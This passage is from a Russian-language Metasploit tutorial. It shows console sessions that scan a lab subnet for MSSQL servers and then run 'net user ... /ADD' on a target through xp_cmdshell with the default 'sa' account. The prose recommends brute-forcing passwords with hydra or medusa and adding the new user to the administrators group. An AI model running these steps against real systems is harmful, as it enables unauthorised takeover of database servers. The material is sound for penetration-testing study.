admin/mssql/mssql_exec     Run a command via xp_cmdshell
   admin/mssql/mssql_sql      Run simple SQL against the MSSQL instance
   scanner/mssql/mssql_login  MSSQL Login Utility
   scanner/mssql/mssql_ping   MSSQL Ping Utility
 
msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options
 
Module options:
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   THREADS  1                yes       The number of concurrent threads 
 
msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > run
 
[*] SQL Server information for 10.211.55.128:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

Первой командой мы задали поиск всех 'mssql' плагинов. Второй набор задает инструкцию 'use canner/mssql/mssql_ping', использовать модуль сканирования. Далее 'show options' отображает все необходимые параметры. Параметр 'set RHOSTS 10.211.55.1/24' позволяет задать диапазон подсети сканирования SQL серверов. Вы можете указать любую маску, например /16. Я бы рекомендовал увеличить число потоков, потому как сканирование в один поток может занять очень много времени.
После команды 'exploit' выполняется сканирование с последующим выводом информации о MSSQL сервере. Как видим, имя машины "SSHACKTHISBOX-0", а порт TCP на котором «висит» сервер — 1433. На этом этапе можно попробовать модуль 'scanner/mssql/mssql_login', который может угадать пароль, но этот модуль не поддерживает атаки по словарю. Для перебора «грубой силой» можно попробовать воспользоваться Fast-Track или специализированными утилитами для брута, medusa или hydra. После успешного подбора пароля существует модуль для выполнения команд на удаленном сервере.

msf auxiliary(mssql_exec) > show options
 
Module options:
 
   Name        Current Setting                          Required  Description
   ----        ---------------                          --------  -----------
   CMD         echo metasploit >> C:\defenseisdead.txt  no        Command to execute
   MSSQL_PASS                                           no        The password for the specified username
   MSSQL_USER  sa                                       no        The username to authenticate as
   RHOST                                                yes       The target address
   RPORT       1433                                     yes       The target port 
 
msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set MSSQL_PASS password
MSSQL_PASS => password
msf auxiliary(mssql_exec) > set CMD net user rel1k ihazpassword /ADD
cmd => net user rel1k ihazpassword /ADD
msf auxiliary(mssql_exec) > exploit
 
The command completed successfully.
 
 
[*] Auxiliary module execution completed

Посмотрев выше можно заметить, что строкой 'net user rel1k ihazpassword /ADD' мы добавили пользователя "rel1k", также мы могли бы ввести команду 'net localgroup administrator rel1k /ADD' , чтобы добавить нового пользователя в локальную группу «администраторы» сервера базы данных, тем самым получив полный контроль над системой

Идентификация сервиса.

Опять же вместо сканирования Nmap будем использовать инструменты Metasploit, для сканирования на наличие сервисов в целевой сети, Metasploit включает большое количество сканеров, позволяющих найти и идентифицировать потенциально уязвимые сервисы на удаленной системе.

msf auxiliary(tcp) > search auxiliary ^scanner
[*] Searching loaded modules for pattern '^scanner'...
 
Auxiliary
=========
 
   Name                                         Description
   ----                                         -----------
   scanner/db2/discovery                        DB2 Discovery Service Detection.
   scanner/dcerpc/endpoint_mapper               Endpoint Mapper Service Discovery
   scanner/dcerpc/hidden                        Hidden DCERPC Service Discovery
   scanner/dcerpc/management                    Remote Management Interface Discovery
   scanner/dcerpc/tcp_dcerpc_auditor            DCERPC TCP Service Auditor
   scanner/dect/call_scanner                    DECT Call Scanner
   scanner/dect/station_scanner                 DECT Base Station Scanner
   scanner/discovery/arp_sweep                  ARP Sweep Local Network Discovery
   scanner/discovery/sweep_udp                  UDP Service Sweeper
   scanner/emc/alphastor_devicemanager          EMC AlphaStor Device Manager Service.
   scanner/emc/alphastor_librarymanager         EMC AlphaStor Library Manager Service.
   scanner/ftp/anonymous                        Anonymous FTP Access Detection
   scanner/http/frontpage                       FrontPage Server Extensions Detection
   scanner/http/frontpage_login                 FrontPage Server Extensions Login Utility
   scanner/http/lucky_punch                     HTTP Microsoft SQL Injection Table XSS Infection
   scanner/http/ms09_020_webdav_unicode_bypass  MS09-020 IIS6 WebDAV Unicode Auth Bypass
   scanner/http/options                         HTTP Options Detection
   scanner/http/version                         HTTP Version Detection
...snip...
   scanner/ip/ipidseq                           IPID Sequence Scanner
   scanner/misc/ib_service_mgr_info             Borland InterBase Services Manager Information
   scanner/motorola/timbuktu_udp                Motorola Timbuktu Service Detection.
   scanner/mssql/mssql_login                    MSSQL Login Utility
   scanner/mssql/mssql_ping                     MSSQL Ping Utility
   scanner/mysql/version                        MySQL Server Version Enumeration